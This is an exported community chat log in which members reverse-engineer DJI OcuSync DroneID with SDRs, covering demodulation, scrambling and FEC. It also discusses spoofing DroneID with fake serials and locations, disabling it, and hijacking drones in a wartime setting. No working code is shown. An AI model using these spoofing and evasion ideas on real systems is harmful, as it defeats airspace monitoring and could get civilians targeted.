[2022-04-05 03:37:26] hostile : I think in here @skyninja & @nullrefexception are the only ones to openly discuss that they can successfully use hackRF to receive and decode OccuSync DroneID. We must maybe send their wife roses, or chocolate, and sweet talk them to share so we can help save lives. Some people are in odd position and can not share such things, so if we can not convince sharing , we will work to liberate it.

[2022-04-05 03:38:09] skarzhevsky : This will be difficult if a mass solution is needed

[2022-04-05 03:38:21] hostile : I think in here @skyninja & @nopexecutorare the only ones to openly discuss that they can successfully use hackRF to receive and decode OccuSync DroneID. We must maybe send their wife roses, or chocolate, and sweet talk them to share so we can help save lives. Some people are in odd position and can not share such things, so if we can not convince sharing , we will work to liberate it.

[2022-04-05 03:38:34] hostile : I think in here @skyninja & @nopexecutor are the only ones to openly discuss that they can successfully use hackRF to receive and decode OccuSync DroneID. We must maybe send their wife roses, or chocolate, and sweet talk them to share so we can help save lives. Some people are in odd position and can not share such things, so if we can not convince sharing , we will work to liberate it.

[2022-04-05 03:39:10] hostile : @skarzhevsky I'm sure someone could source a pile of the cards for you and deliver them. If people are getting crates of DJI drones there, they can also get crates of WIFI cards that support 1/4 rate.

[2022-04-05 03:39:35] hostile : but yes... supporting m.2 wifi card is only certain laptops. Could also configure a raspberry pi. There are some choices.

[2022-04-05 03:39:56] hostile : not optimal, but it is the most reliable solution, until we complete something different

[2022-04-05 03:41:00] hostile : gnuradio gr-ieee802-11 can also be used for enhanced wifi

[2022-04-05 03:44:41] hostile :

[2022-04-05 03:45:00] hostile : this here shows a DJI drone picked up with hackRF

[2022-04-05 03:45:17] hostile : and kismet running next to it confirming same information

[2022-04-05 03:48:19] hostile : for now with Occusync DroneID we must beg, borrow, or steal hackRC flowgraph .grc.

[2022-04-05 03:48:55] hostile : I'm not below bribery, or GoFundMe =]

[2022-04-05 03:49:23] hostile : maybe one of them needs a fancy new drone for their troubles.

[2022-04-05 04:20:20] skarzhevsky : @skyninja @nopexecutor Please tell me, at what distance did you manage to intercept and decode DroneID messages from a DJI drone using HackRF and what antenna did you use?

[2022-04-05 04:58:38] hostile : https://dji-rev.com/dji-rev/pl/g7i78sioxj8c8rdkwddqnd98tc

[2022-04-05 04:58:44] hostile : https://dji-rev.com/dji-rev/pl/ah5bgc5n8fngxnuutwqum1yuqw

[2022-04-05 04:58:58] hostile : https://dji-rev.com/dji-rev/pl/tp6g78eqg3fwux4nnhs8xb3xec

[2022-04-05 05:01:32] hostile : https://dji-rev.com/dji-rev/pl/obsjx6zwejfh3pfqud3o5ft79c

[2022-04-05 05:01:34] hostile : https://dji-rev.com/dji-rev/pl/gjz1ir58nif1f8pnhzyztdptyw

[2022-04-05 05:05:23] hostile : sample cap here https://dji-rev.com/dji-rev/pl/rtuygdnpkjyx5efopjsw1xqgqo

[2022-04-05 05:05:26] hostile : https://dji-rev.com/dji-rev/pl/tknswxsjup8zzercc3pxwhsybw

[2022-04-05 05:06:57] hostile : This a long time ago worked to disable droneID. https://dji-rev.com/dji-rev/pl/eythrun33tbouc4g6p33madrow I think the command is signed now IIRC>

[2022-04-05 05:07:11] hostile : https://dji-rev.com/dji-rev/pl/egxt1knyw3r68rawsfa5487nja

[2022-04-05 05:09:46] hostile : https://dji-rev.com/dji-rev/pl/fi9efdtgufbb5rkd8gg5zr315o

[2022-04-05 05:09:48] hostile : https://dji-rev.com/dji-rev/pl/5bb9txt4sjgafyptq8z7j5f1eo

[2022-04-05 05:10:02] hostile : as you can see all kinds of historic info in here @skarzhevsky

[2022-04-05 05:10:46] hostile : https://dji-rev.com/dji-rev/pl/476zr9snwjggtfscwkqxf7jz9r

[2022-04-05 05:15:36] hostile : so here our Occucync ninjas are @nopexecutor @skyninja @validat0r @atlantic and @tmbinc. The best we are likely to get in the near term I assume would be assistance while fumbling along to catch up. Intelligent questions will likely need to be answerd

[2022-04-05 05:15:48] hostile : @icer check the backlog tonight btw... good recap.

[2022-04-05 07:00:25] the_lord : I never saw any update on this document since it was released Maybe no body purchased this SDK :)

[2022-04-05 07:39:06] skyninja : I have never understand the purpose of this document. Why did they publish it, you can't do anything with it.

[2022-04-05 12:39:05] hostile : You can buy aeroscope SDK for $$$$ and make your own integrations @skyninja

[2022-04-05 12:39:57] skyninja : easier to use the web SDK REST API, isn't it?

[2022-04-05 12:41:38] hostile : depeneds on your integration path. "easier" is subjective

[2022-04-05 18:31:08] hostile : just posted this in a few other rooms.

[2022-04-05 18:31:26] hostile : but interesting.I was just asking about the UTMISS stuff. https://www.doi.gov/sites/doi.gov/files/dji-government-edition-android-and-assistant-update-analysis-2021-05-06.pdf

[2022-04-06 02:38:36] hostile : Here is a patch to help gr-ieee802-11 see DJI EnhancedWifi on the default channel + some things to silence overly verbose debug messages. https://dji-rev.com/dji-rev/pl/jcykuwqwxbns7bhiyrx1m4etwc

[2022-04-06 17:51:03] quad_fan : quad_fan joined the channel.

[2022-04-06 22:21:13] hostile : can anyone in @channel confirm the OccuSync droneID logic? is it like enhanced wifi in that it waits for the props to be on before broadcast?

[2022-04-06 22:21:41] hostile : can anyone in @here confirm the OccuSync droneID logic? is it like enhanced wifi in that it waits for the props to be on before broadcast?

[2022-04-06 22:33:52] tmbinc : I think that was the case, yes

[2022-04-06 22:49:22] hostile : @tmbinc we seeing a signal that's about 10 mhz wide, only shows up every ~ 600 milliseconds, is definitely from the drone, and it 100% not the video downlink. But props aren't armed so wasn't sure if this was it or not.

[2022-04-06 23:00:08] the_lord : not all drones need motor arm to start droneID

[2022-04-06 23:02:58] hostile : know about mini 2 behavior?

[2022-04-06 23:05:08] the_lord : as far as I remember, all new drones start broadcasting droneID once switched on

[2022-04-06 23:19:42] rflagg : I haven't been able to get a mavic3 to broadcast drone ID in the US even when flying...

[2022-04-06 23:19:57] tmbinc : Maybe I was just unlucky in capturing it then. Yes, droneid is every 640ms (every 640 subframes)

[2022-04-06 23:20:05] rflagg : But I've seen video of people using the opendroneid app on the mavic3 in italy

[2022-04-06 23:20:18] hostile : opendroneID, and DJI drone ID are two different things

[2022-04-06 23:20:30] hostile : one is the EU spec, the other DJi's

[2022-04-06 23:20:56] rflagg : ok, so opendroneID only shows up when GPS says it's in EU?

[2022-04-06 23:21:27] hostile : yes

[2022-04-06 23:21:29] rflagg : is drone ID for the mavic3 supposed to be a wifi beacon still? tried all kinds of things to sniff it

[2022-04-06 23:21:42] rflagg : it's that ie1000 chip

[2022-04-06 23:21:52] hostile : occusync should have it's own droneID packet from DJI in the occysync comms

[2022-04-06 23:22:34] rflagg : ok, so that's what occusync is... has anyone sniffed occusync?

[2022-04-06 23:23:10] hostile : scroll up... to my re posts of chatter from last night

[2022-04-06 23:29:55] rflagg : Ok, so it's a GnuRadio project.

[2022-04-07 00:33:27] hostile : for occusync, gonna have to be

[2022-04-07 00:33:35] hostile : Mavic3 is occusync

[2022-04-07 00:34:22] hostile : got my dude honed in now

[2022-04-07 04:19:46] hostile : constellation view for Occusync on Mini 2

[2022-04-07 04:20:48] hostile :

[2022-04-07 04:22:59] hostile : my dude said thanks btw @tmbinc https://github.com/tmbinc/random/blob/master/dji/ocusync2/play.py

[2022-04-07 04:28:19] hostile : does anyone know the zadoff chu params and how the two synchronization sequences are created? We need them in order to properly adjust phase offsets since it doesn't look like there are pilots. My dude is eyeballing the zc sequence to figure out what is going on tomorrow hopefully. But if ya have hints chuck em out.

[2022-04-07 04:44:52] hostile : FEC detail anyone?

[2022-04-07 05:23:26] tmbinc : FEC is just normal LTE turbo code

[2022-04-07 05:24:16] tmbinc : Phase offsets (fractional sample offset) is precisely the problem I wasn't able to solve automatically

[2022-04-07 07:02:14] tmbinc : Scrambling i'm not sure - gold code repeats on 3rd symbol (i.e. 0+1, then 2+... use the same "dummy" sequence), is that some LTE stuff?

[2022-04-07 07:39:14] goguma : goguma joined the channel.

[2022-04-07 09:54:28] tho : tho joined the channel.

[2022-04-07 10:18:59] ray_t : ray_t joined the channel.

[2022-04-07 14:00:53] john_duff : john_duff joined the channel.

[2022-04-07 14:07:22] stanlee : It's fun to watch @hostile here basically killing it as a boss!

[2022-04-07 14:22:16] hostile : I'm just a master cat wrangler! There are plenty of cats to wrangle to help liberate info!

[2022-04-07 14:27:14] mavic2reverser : soooooo how soon after @hostile publishes all this does DJI shit a brick and decide to make occusync 4.0 that's TOTALLY different.... meaning some new DJI shit crypto

[2022-04-07 14:30:02] hostile : TBH I hope it forces them to sign the droneID packets

[2022-04-07 14:30:26] hostile : or sunset it entirely. The EU standard should IMHO similarly be signed packets.

[2022-04-07 14:30:35] hostile : but that's a management nightmare lol

[2022-04-07 14:30:49] hostile : cuz you know we just gonna steal what ever keys would be used

[2022-04-07 14:31:29] hostile : there in lays the joke "H.A.R.D. - Hackers Against Remote DroneID" this is hard!

[2022-04-07 15:06:39] mavic2reverser : plus it brings into the conversation: how do you sign it? HOW DO YOU PROTECT THE KEY WHICH SIGNS IT??? we all know the super talented here can generate or leak their keys

[2022-04-07 15:07:06] mavic2reverser : and all it takes is for one to leak the key for all!

[2022-04-07 15:07:56] hostile : what you do is ya pack your bags up, turn that shit off, go home and call it a good run. =]

[2022-04-07 15:08:31] mavic2reverser : but then how will china collect data and track people?!!

[2022-04-07 15:20:39] hostile : some interesting stuff in here: https://jrupprechtlaw.com/wp-content/uploads/2021/08/19-Brennan-and-RDQ-Opening-Brief-Addenda.pdf

[2022-04-07 15:20:52] hostile :

[2022-04-07 15:28:01] mavic2reverser : with remote ID enforcement coming soon for all drones, I'm wondering how open source alternatives like px4 or Ardupilot will enforce it. nothing prevents someone from gutting that feature out of the code and recompiling

[2022-04-07 15:40:29] joonas : don't know about px4 or ardupilot specifically, but i imagine for us fpv folks (well, i'm from the eu so... different story anyway) it's going to basically have to be a separate uart module that you'll have to install, in addition to now also requiring gps. and i think there's an exemption for sub 250g? so very likely it'll be a configurable thing anyway. so basically, it's down to pilot liability.

[2022-04-07 15:40:29] joonas : don't know about px4 or ardupilot specifically, but i imagine for us fpv folks (well, i'm from the eu so... different story anyway) it's going to basically have to be a separate uart module that you'll have to install, in addition to now also requiring gps. and i think there's an exemption for sub 250g? so very likely it'll be a configurable thing anyway.

[2022-04-07 15:52:51] hostile : rulemaking carves out exceptions

[2022-04-07 15:52:51] hostile : rulemaking carves our exceptions

[2022-04-07 15:53:06] hostile : mavlink has droneID support now

[2022-04-07 15:55:49] hostile : https://jrupprechtlaw.com/wp-content/uploads/2021/03/19-Brennan-and-RDQ-Opening-Brief.pdf

[2022-04-07 16:12:54] hostile : Progress fron Protoman here https://github.com/proto17/dji_droneid/tree/main/matlab

[2022-04-07 17:15:53] jan2642 : Would that work in Octave ?

[2022-04-07 17:20:33] hostile : checking

[2022-04-07 17:25:31] hostile : "it will not due to some functions i'm using, but i think i can create those functions by hand. let the person know that i'm gonna try to make it run in octave too", so sit tight @jan2642

[2022-04-07 18:14:25] jan2642 : That would be cool, thanks!

[2022-04-07 18:46:25] tmbinc : Does the code above not have the problem of a sampling offset (corresponding to I/Q rotation proportional to subcarrier index)?

[2022-04-07 18:46:33] tmbinc : I don't see it correcting for that but that's the issue I ran into

[2022-04-07 18:46:41] tmbinc : (mainly due to no pilots)

[2022-04-07 19:03:13] azerbaijan : 26519433644a joined the channel.

[2022-04-07 19:11:53] hostile : @jan2642 updated to use Octave

[2022-04-07 19:12:37] hostile : @tmbinc he's working at solving that freq offset issue now

[2022-04-07 19:13:48] hostile : pilot issue was the deal last night https://dji-rev.com/dji-rev/pl/ex311sgn7jddmksixbwrxpijsy

[2022-04-07 19:25:44] hostile : @tmbinc he said he "solved the timing offset issue by oversampling 4x and hunting for the first ZC sequence (it's symmetric so i can autocorrelate for it). that helps keep the data carriers from rotating (no walking phase rotation)"

[2022-04-07 19:27:50] tmbinc : Hunting for it in time domain?

[2022-04-07 19:28:19] hostile : I'll see if I can get him to hop on here and discuss real time

[2022-04-07 19:28:44] hostile : " to deal with the absolute phase rotation i need to know at least one data carrier in the burst that never changes. i can reference all other data carriers to it and be golden. worst case is i try all 4 phase rotations and let the CRC tell me if i got it right"

[2022-04-07 20:09:49] hostile : "i've got a single carrier always clocked at 45 degrees. if that's legit then it might help with phase correction even though we don't know the zc sequence"

[2022-04-07 20:26:02] hostile : bits! time to sort out the scrambler params

[2022-04-07 20:33:21] jan2642 : Which SDR is used ? 5.782 GHz and a samplerate of 30.72 MHz. My Lime doesn't go above 3.8 GHz but I've forced the mavic 2 to 2.4 GHz.

[2022-04-07 20:33:54] jan2642 : A HackRF can go to 6 GHz but only 20 MHz wide.

[2022-04-07 20:34:18] the_lord : welcome back jan2642, as I knew from the guys, you can't see the droneID in the waterfall

[2022-04-07 20:37:12] jan2642 : Hi @the_lord ! But I can see the frequency and bandwidth. As far as I know only the upstream uses frequency hopping but downstream is at a fixed frequency.

[2022-04-07 20:38:28] the_lord : as I understood, its too small to be seen on waterfall

[2022-04-07 20:39:44] hostile : currently testing with ettus b205-mini

[2022-04-07 20:45:13] icer : A bladerf micro can do 30mhz with no problem

[2022-04-07 20:47:30] jan2642 : less expensive, still expensive ?

[2022-04-07 20:50:07] hostile : @jan2642 misleading filename... he's also using 2.4ghz FYI

[2022-04-07 20:50:45] hostile : ``` Recordings were taken with an Ettus B205-mini at a sampling rate of 30.72 MSPS. The signal of interest is in 2.4 GHz and will show up every 600 ms or so. It will be 10 MHz wide (15.56 MHz with guard carriers).```

[2022-04-07 20:51:33] hostile : https://github.com/proto17/dji_droneid/blob/main/README.md?plain=1#L12

[2022-04-07 21:17:03] tmbinc : Here's a PNG showing the different signal components over ~1.3s

[2022-04-07 21:17:09] tmbinc : Sorry it's to wide to display inline (hence the .zip)

[2022-04-07 21:17:46] tmbinc : You can clearly see the droneid packets every 640ms

[2022-04-07 21:18:28] tmbinc : The hopping pattern is really interesting as well

[2022-04-07 21:18:41] tmbinc : Some kind of .. sine? function

[2022-04-07 21:18:59] tmbinc : Which also changes? (This is one continous capture)

[2022-04-07 21:22:06] jan2642 : So I have to look for a 10 MHz-wide signal at 640 ms intervals but at a different frequency than the video stream ?

[2022-04-07 21:22:26] tmbinc : Yes

[2022-04-07 21:22:39] tmbinc : I think it's at a fixed frequency, either in 2.4GHz or 5GHz band, but I'm not sure

[2022-04-07 21:47:50] hostile : yeh needs to be fixed cuz aeroscope isn't hopping

[2022-04-07 22:05:17] jan2642 : I have to stop and go to bed, I did too many stupid things in row... I didn't saw the signal and thought that maybe it was because the drone wasn't flying (mavic 2). There's a storm outside so I had the brilliant idea of firing it up inside without remembering that the blades can be removed. Next I accidentally hit the stick of the remote and off it went. In a panic reaction I tried to grab it from below but my fingers went up too high. Result: blood blisters on the top of 4 fingers. I hope I can still type tomorrow ?

[2022-04-07 22:24:49] hostile : you don't actually have to "fly" btw

[2022-04-07 22:24:59] hostile : simply arming the sticks works

[2022-04-07 22:25:17] hostile : jesus man! hopefully you ok!

[2022-04-07 22:25:23] hostile : #RespectTheProp for sure

[2022-04-07 22:25:26] hostile : they DO bite

[2022-04-07 22:26:04] hostile : lucky you didn't remove fingers!

[2022-04-08 04:05:21] hostile : my dude asking some very specific question ATM

[2022-04-08 04:05:25] hostile : "what are the parameters required to seed the second scrambler LFSR, *exactly* how does one apply the turbo decoder (can i just throw the bits from all data carriers into a turbo decoder configured for 3GPP mode and get valid data)"

[2022-04-08 04:06:49] hostile : also repo updated with all current info https://github.com/proto17/dji_droneid

[2022-04-08 04:07:45] hostile : someone asked about frequencies.

[2022-04-08 04:07:50] hostile :

[2022-04-08 09:41:51] andrewbboo : andrewbboo joined the channel.

[2022-04-08 10:28:58] j4ck : Hi guys, I am part of a german researcher group and we have also investigated the OcuSync protocol and DroneID. We are now able to receive DroneID and decode it automatically. This also shows that there is no security or encryption layer in the DroneID packages as claimed by DJI. We also plan to release our code soon and open source our toolset. If you are interested in an exchange feel free to write me. We were also able to modify the serial number of the FC, which also shows up in the DroneID packages.

[2022-04-08 10:37:56] tho : As a quick note: @j4ck has also implemented a DUML fuzzer and reverse engineered parts of the controller and drones (focus on the S1 chip). We plan to document the results in a scientific article soon, feel free to reach out to him. @tmbinc helped us a lot - kudos to him!

[2022-04-08 10:42:49] w0h : That's interesting! I also wrote a DUML fuzzer for the logic protocol for my thesis and am also close to completion!

[2022-04-08 10:42:49] w0h : That's interesting! I have done the same for my Bachelor Thesis and am also close to completion!

[2022-04-08 10:45:18] bin4ry : great work guys !

[2022-04-08 13:32:01] rebellion : rebellion joined the channel.

[2022-04-08 14:14:37] tmbinc : So, next step is to decode arbitrary packets? :)

[2022-04-08 14:18:20] tho : and spoof packets :-)

[2022-04-08 14:18:35] hostile : yup. That is the important conversation changing part.

[2022-04-08 14:18:45] tho : or analyze the pairing process to understand if/how drones can be hijacked...

[2022-04-08 14:18:45] hostile : democratize packet generation, and reception

[2022-04-08 14:19:13] hostile : @tho having worked at a CUAS company, I can tell you for a fact that can be hijacked, and DUML injected.

[2022-04-08 14:19:39] tho : interesting!

[2022-04-08 14:19:59] hostile : we actively demonstrated this for LightBridge protocol at BlackDart among other places.

[2022-04-08 14:31:04] hostile : @j4ck if you can help with some answers on the scrambler that would be useful! https://dji-rev.com/dji-rev/pl/d1hiy9cii7bedjxfkkgz1g4msc

[2022-04-08 14:33:28] hostile : @hotelzululima pointed out some jammers in this paper, anyone tried em against Occusync? https://digital.wpi.edu/downloads/xk81jn93r A bit off topic for this room specific, but interesting none the less. Some python code attached at end of the paper.

[2022-04-08 14:52:32] proto : proto joined the channel.

[2022-04-08 14:54:11] hostile : ahhhh snap. It's all over now. We apparently let anyone in here, @proto =] Folks this is my homeboy that's been helping with the Occusync work here: https://github.com/proto17/dji_droneid

[2022-04-08 14:54:23] proto : hello all!

[2022-04-08 15:04:21] dragorn : dragorn joined the channel.

[2022-04-08 15:05:10] dragorn : LMK when you're ready to release some code, would love to automate pulling it into kismet as well; i've got adsb plotting, should be able to add droneid wifi and rf plotting to it fairly easily

[2022-04-08 15:05:50] proto : as @hostile pointed out, I've been working on demodulating and decoding the DroneID frames. I have some MATLAB/Octave scripts that can detect the first Zadoff-Chu sequence for timing lock, do a *very rough* frequency offset detection using the cyclic prefixes (this needs some love), extract out the data carriers from symbols 1,2,3,5,7,8,9, and finally demod bits from the QPSKs. What remains is the scrambler, FEC, and rate matching. My experience with cellular protocols is almost non-existent. It's been pointed out in here that the scrambler and FEC are following the LTE spec. The issue I'm having is that I simply don't know the spec enough to figure out what knobs to turn. As an example, I'm currently stuck trying to figure out the initial state of the second LFSR used to generate the scrambling code. The first one is a constant value (horray!), but the second requires information about the UE (https://edadocs.software.keysight.com/pages/viewpage.action?pageId=6076479&preview=/6076479/6076480/pdsch_cinit.gif)

[2022-04-08 15:07:22] proto : So, if anyone here has any info that could help I'd love to hear it! Will be making everything open source. I hope to make a GNU Radio flow graph (probably with some custom OOT modules) to decode these on the fly

[2022-04-08 15:14:21] atlantic : reverse engineering is an art where the journey is more important than the destination. do not ask for direct answers, but do the puzzle and learn a lot. You are doing Ocusync 2 and in that version it happens that DJI gave us a gift to solve the scrambling puzzle.

[2022-04-08 15:15:19] atlantic : also in slicing the bits, you should be more soft and not so hard, you will gain more from it ?

[2022-04-08 15:16:33] hostile : @atlantic that altruism is great bud... we're trying to stop people from getting shelled by Russian's. Some of us aren't here for the journey. We are dedicating very small amounts of free time to saving lives.

[2022-04-08 15:16:33] hostile : @atlantic that alrusim is great bud... we're trying to stop people from getting shelled by Russian's. Some of us aren't here for the journey. We are dedicating very small amounts of free time to saving lives.

[2022-04-08 15:16:47] proto : i assume you mean soft decision vs hard decision? i've decided just for the moment to ignore soft decision as i have a pristine collect to work with. but i completely agree that soft decision is the way to go in the future

[2022-04-08 15:20:11] proto : i'd be game to try random things with the second LFSR initial state (all ones, all zeros, revs, etc) if there were a plaintext under that i could validate with. but, considering that i still have to account for the FEC and rate matching, i don't think i would have anything to tell me that i was on the right track. unless there is a CRC that's sent along with the FEC which would be very nice :) then i could just try things and throw the resulting bits at reveng (https://reveng.sourceforge.io/)

[2022-04-08 15:22:49] skyninja : you can spoof any DJI drone with wifi, even the drone that are ocusync. Aeroscope does not tell its source to the operator. Also you can spoof with normal 20 MHz wifi, no need for quarter channel. Aeroscope is dumb. So for spoofing there is no need to RE Ocusync.

[2022-04-08 15:23:03] tmbinc : lol nice

[2022-04-08 15:23:43] proto : @skyninja i think the issue is that even if you spoof WiFi frames the DroneID is still getting out and isn't WiFi (it's LTE-like afaik)

[2022-04-08 15:24:41] skyninja : But RE Ocusync will not stop it from being transmitted,

[2022-04-08 15:25:07] hostile : @skyninja *for now*.... and I think that does make some assumptions, one being for example that Aeroscope is the only device being used for reception. The 20mhz wifi spoof has been a thing ever since I first demonstrated with the "throwies" TBH I'm surprised DJI hasn't adjusted their code a bit. It is only a matter of time before a customer asks for more robust detections.

[2022-04-08 15:25:31] proto : @skyninja correct, but in the course of the RE work for DroneID, we learn how to spoof those frames and overwhelm an aeroscope

[2022-04-08 15:25:38] hostile : @skyninja no, but for 'old crows' and EW folks... picking out a fakes Wifi frame amongst Occusync frames sticks out like a sore thumb.

[2022-04-08 15:26:01] hostile : also it is trivial to simply disable the wifi detection all together in the aeroscope IMHO

[2022-04-08 15:27:05] hostile : If you don't get the 'crows' reference. https://www.crows.org

[2022-04-08 15:27:28] proto : oh, and if things like the takeoff location are sent via DroneID, we can spoof those as well :)

[2022-04-08 15:28:35] dragorn : I'd agree re: spoofing being blatant, but there's a lot of nonsense you can do, depending on the goals

[2022-04-08 15:28:40] skyninja : the bytes transmitted in an ocusync drone id = 100% bytes in wifi drone id.

[2022-04-08 15:28:50] hostile : this isn't just a *fun* game of 'can I break the toy protocol from the hobby drone company' any more. Peoples lives legit depend on this protocol being opened in *full* for both reception and packet generation. This happens to be in one *theater* for now. We'll be having this discussion again in another theater in a matter of time.

[2022-04-08 15:28:59] skyninja : just a different carrier

[2022-04-08 15:29:03] dragorn : @skyninja i think it was in reference to being obvious when you have 2 occusync devices on the scope, and 10000 wifi ones.

[2022-04-08 15:29:09] dragorn : since wifi is trivially spoofable

[2022-04-08 15:29:48] skyninja : but on an Aeroscope you do not see wheter it was received on wifi or ocusync

[2022-04-08 15:30:08] hostile : correct... and you'd be a fool to think aeroscope is the only fielded solution.

[2022-04-08 15:30:11] dragorn : re: spoofing for countermeasures in this specific situation, i'd suggest capturing the existing drone serial numbers and coordinates, then flooding with a thousand adjacent serial numbers above and below, and fuzzing the coordinates by some percentage - 5%? 10%?

[2022-04-08 15:30:58] dragorn : because you don't want the legit device you presumably can't deactivate beaconing on to be discernable either by unique/valid id, or unique/consistent/valid/regionally local location

[2022-04-08 15:31:16] dragorn : just fill the monitoring with system with a thousand+ devices that are all equally plausible

[2022-04-08 15:31:47] hostile : there is also something to be said about the fact that I created this place to liberate information. We all have a tendency to keep our cool shit to ourselves. Literally none of us would be here had I note *shared* and pushed for continual sharing. I've been gone for 3 years... I'm back... and I'm gonna do what I used to do. Push conversations OUT of DM's and private rooms, and back into the open so we can foster doing cool shit *together* instead of operating in a vacuum. The RedHerring had a purpose... https://github.com/MAVProxyUser/P0VsRedHerring

[2022-04-08 15:31:47] hostile : there is also something to be said about the fact that I created this place to liberate information. We all have a tendency to keep our cool shit to ourselves. Literally none of us would be here had I not *shared* and pushed for continual sharing. I've been gone for 3 years... I'm back... and I'm gonna do what I used to do. Push conversations OUT of DM's and private rooms, and back into the open so we can foster doing cool shit *together* instead of operating in a vacuum. The RedHerring had a purpose... https://github.com/MAVProxyUser/P0VsRedHerring

[2022-04-08 15:31:47] hostile : there is also something to be said about the fact that I created this place to liberate information. We all have a tendency to keep our cool shit to ourselves. Literally none of us would be here had I note *shared* and pushed for continual sharing. I've been gone for 3 years... I'm back... and I'm gonna do what I used to do. Push conversations OUT of DM's and private rooms, and back into the open so we can foster doing cool shit *together* instead of operating in a vacuum. The RedHerring had a purpose... https://github.com/MAVProxyUser/P0VsRedHerring

[2022-04-08 15:31:49] dragorn : downsides: you may now be throwing nearby locations into the targetting system

[2022-04-08 15:32:44] skyninja : downside you may accidently give the gps of somebody's house

[2022-04-08 15:32:50] dragorn : As I said.

[2022-04-08 15:33:11] hostile : @dragorn I'd like to get to a point where we can feed it DJI log files, and provide the code with an offset from the existing GPS locations. And let is *replay* historic flights.

[2022-04-08 15:33:33] hostile : It would be nice to load up a device full of log files, and an offset, and set it somewhere and let it spoof all night a pile of legit flight paths

[2022-04-08 15:33:45] hostile : localized to current location, or anywhere the operator desired.

[2022-04-08 15:35:34] hostile : @hotelzululima and I used to talk of "crybaby"... this is basically that concept. https://twitter.com/d0tslash/status/845110652293332992?s=20&t=-7OYs0yQGzh9Qn8Ux-WnGA

[2022-04-08 15:35:42] dragorn : I think it needs to be clear: What's being discussed is warfare. If anyone here thinks they, personally, are going to be deploying jackass hacker code against fucking *russia* with no repercussions or side effects... yeah. Shit's real. I wouldn't advocate *anyone* think they're going to deploy spoofer code in a literal warzone with active civilian casualties on a whim and just run with it. On the other hand, I would be 100% comfortable with providing a documented, working system to the defense commanders and allowing THEM to make the decisions they need to make.

[2022-04-08 15:36:23] hostile :

[2022-04-08 15:37:20] hostile : I know some of you have been passed on OPSEC documents that are being fielded right now in Ukraine as a means to keep pilots alive. Literal checklists of things do to, to not die while using DJI drones. I'm just trying to help level the playing field *here*, and everywhere else.

[2022-04-08 15:38:03] hostile : Keeping in mind this also has some domestic applicability. If you missed this. I suggest you look at it again if you are a privacy buff. https://dji-rev.com/dji-rev/pl/pptszbnjj7nqubyik678fkb4uo

[2022-04-08 15:38:14] dragorn : (Just to continue beating that drum to be clear: yes. spoofing random GPS locations could get someones house / school / etc bombed. Don't fucking do that, because that's not any of our calls to do. Flip side if the defense commander knows the area is cleared and needs to protect operators during the pull out, a tool can save lives.)

[2022-04-08 15:38:51] hostile : Shit getting real for ALL of us...

[2022-04-08 15:40:10] dragorn : AKA "some of the reasons i got out of that industry once promises were being made re: protection that weren't possible, and the stakes become 'people get blowed up' not 'oh no, pictures of your resort.' ".

[2022-04-08 15:40:10] dragorn : AKA "some of the reasons i got out of that industry once promises were being made re: protection that weren't possible, and the stakes become 'people get blowed up' not 'oh no, pictured of your resort.' ".

[2022-04-08 15:41:29] hostile : @dragorn yeah it is not at all lost on me, that I'm back here *now* for the exact same reasons I left as well... overzealous sales folks selling protection hype that just wasn't accurate. Crazy how that works! I legit got PTSD from time at D13. Hence why I literally threw every drone related thing I had and black listed all drone talk for nearly 3 years.

[2022-04-08 16:14:51] tho : instead of spoofing to create artificial decoy drones, a complementary approach could be to develop a patch for the controller (maybe drone as well?) that disables DroneID. then an aeroscope could not pick up the signal anymore, but remote control and video would still be possible. would this be viable?

[2022-04-08 16:17:47] hostile : tools to disable droneID exists. DJI claims it is not possible. Part of this effort is to make them acknowledge the functionality in the same fashion they do NFZ unlocks.

[2022-04-08 16:18:08] hostile : IF someone wants to request a disable they should not have to contact OGs that have morality conflicts and issues vetting the requests.

[2022-04-08 16:18:32] hostile : if disabling droneID is outlawed, only outlaws have drones with disabled droneID

[2022-04-08 16:19:29] hostile : we had the same morality issues with the original NFZ unlock requests

[2022-04-08 16:25:36] tho : probably some people here in this channel are also interested in disabling droneID in a reliable way, that would also be helpful in practice. Spoofing/decoys can have side-effects as mentioned above.

[2022-04-08 16:25:53] tho : In the Ukraine, laws are not followed at the moment...

[2022-04-08 16:31:58] j4ck : @hostile I would recommend the following paper for RM and turbocoding. You will also find information about the subblock interleaving like the permutation table. The scrambling is done via gold sequence https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=4656994

[2022-04-08 16:31:58] j4ck : @hostile I would recommend the following paper for RM and turbocoding. You wil also find infomation about the subblock interleaving like the permutation table. The scrambling is done via gold sequence https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=4656994

[2022-04-08 16:31:58] j4ck : @hostile I would recommend the following paper for RM and turbocoding. You wil also find infomation about the subblock interleaving like the permutation table. The scrambling is done via gold sequence

[2022-04-08 16:50:29] hostile : @tho "In the Ukraine, laws are not followed at the moment..." oh indeed, same argument works there. DJI argued that only 'good guys' have access to receive the "encrypted" droneID packets. Seems to imply that if you can't receive them you are a bad guy ;) https://www.theverge.com/22985101/dji-aeroscope-ukraine-russia-drone-tracking

[2022-04-08 16:52:43] hostile : having sold "0day" in the past. I'm of the mindset now that openly discussing things both allows folks to mitigate, and or take advantage of a situation. It is level opportunity however. Keeping information private only allows folks with money, access, or influence to abuse if they should choose to. I'm personally of the mindset that the DUML commands to disable DroneID simply be shared openly with no fucks. (it will also further the arms race with DJI so some folks opposed to it). The commands aren't *mine* to share none the less. You will absolutely find me reference the few time's they've been shared in public none the less. I have no qualms about information flow.

[2022-04-08 16:53:20] dragorn : absolutely; preventing the transmission rather than having to disperse chaff and hope you can beat heuristics is always a bigger win. 100% agree.

[2022-04-08 16:53:30] hostile : I can make you a knife... and you can cut your steak with it. You can also go stab your neighbor. Simply being aware that I make knives, and exactly how I make them, may perhaps afford you some protection against your neighbor should he choose to stab you just the same.

[2022-04-08 16:56:52] hostile : I hope the memetics I tried to inject years ago make more sense now "H.A.R.D. - Hackers Against Remote DroneID" https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie

[2022-04-08 16:57:05] hostile : this discussion ain't gonna get any easier.

[2022-04-08 17:14:59] dragorn : "the day you learn your academic/hacker bullshit got someone murked"

[2022-04-08 17:15:06] dragorn : bad days, those.

[2022-04-08 17:21:50] dragorn : cue all the mil/intel folks. "yeah no shit kid"

[2022-04-08 18:08:58] hostile : I'll certainly say @dragorn I wasn't expecting people to be writing me literally from a trench thanking me for you and my work alongside the other OGs here in getting this writeup in 2017. "sobering" is perhaps the best word to describe it. https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf

